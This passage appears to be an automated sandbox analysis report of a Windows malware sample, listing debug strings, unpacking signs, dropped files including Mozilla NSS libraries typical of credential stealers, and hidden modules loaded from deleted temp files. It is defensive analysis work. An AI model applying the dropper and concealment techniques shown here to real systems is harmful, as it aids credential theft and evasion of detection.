Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1807890245.000000006C967000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000F.00000002.2048249667.000000006C1F7000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942501439.00000173F45E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938776156.00000173F2430000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: FCBAECGIEB.exe, 00000016.00000002.2883604441.0000000000B1C000.00000002.00000001.01000000.00000018.sdmp, FCBAECGIEB.exe, 00000016.00000000.2059092931.0000000000B1C000.00000002.00000001.01000000.00000018.sdmp, tiktok[1].exe.1.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942377464.00000173F45D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938776156.00000173F2430000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942377464.00000173F45D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1806205477.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806418493.000000000432D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806060081.0000000003B1A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054438772.0000000005560000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2053660650.000000000507F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047243980.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047475652.0000000004339000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2046349447.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204376532.0000000005071000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204654106.0000000005550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959660867.00000173F5390000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2928112460.000001739001C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: nss3.pdb source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Unpacked PE file: 0.2.g77dRQ1Csm.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Unpacked PE file: 1.2.u42w.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Unpacked PE file: 0.2.g77dRQ1Csm.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Unpacked PE file: 1.2.u42w.0.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Code function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00416240

Source: relay.dll.0.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: relay.dll.2.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: cqecfsbe.3.dr	Static PE information: real checksum: 0x0 should be: 0xc411c
Source: tiktok[1].exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: g77dRQ1Csm.exe	Static PE information: real checksum: 0x68bd0 should be: 0x68bd6
Source: FCBAECGIEB.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e

Source: u42w.3.exe.0.dr	Static PE information: section name: .didata
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0042786C push ecx; ret	0_2_0042787C
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0042780C push eax; ret	0_2_0042782A
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0042E3A5 push esi; ret	0_2_0042E3AE
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_00409D06 push ecx; ret	0_2_00409D19
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_004097B6 push ecx; ret	0_2_004097C9
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_02F6D9AB push ebp; iretd	0_2_02F6D9DE
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_02F6968B pushad ; retf	0_2_02F6968C
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_02F6BF39 pushad ; retf	0_2_02F6BF40
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_02F6A720 push ecx; iretd	0_2_02F6A726
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_02F6BC23 push 2B991403h; ret	0_2_02F6BC2A
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_02F6C549 push 00000061h; retf	0_2_02F6C551
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_03171B72 push dword ptr [esp+ecx-75h]; iretd	0_2_03171B76
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0316C3FF push esp; retf	0_2_0316C407
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_03159A1D push ecx; ret	0_2_03159A30
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_03177A73 push eax; ret	0_2_03177A91
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0316C9FD push esp; retf	0_2_0316C9FE
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_03159F6D push ecx; ret	0_2_03159F80
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_004176C5 push ecx; ret	1_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C03B536 push ecx; ret	1_2_6C03B549
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_007FFAB6 push ecx; ret	2_2_007FFAC9
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_007FFB55 push ecx; ret	2_2_007FFB68
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006B0F0B push 8B0086D1h; retf	2_2_006B0F10
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_6C9447D9 push ecx; ret	2_2_6C9447EC
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_6C946365 push ecx; ret	2_2_6C946378

Source: cqecfsbe.3.dr

Static PE information: section name: .text entropy: 6.816444465715168

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\cqecfsbe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File created: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Jump to dropped file
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File created: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	Jump to dropped file
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File created: C:\Users\user\AppData\Local\Temp\u42w.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File created: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File created: C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\cqecfsbe			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CQECFSBE
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\OYSKBSUQGRWDG

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Code function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00408761

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
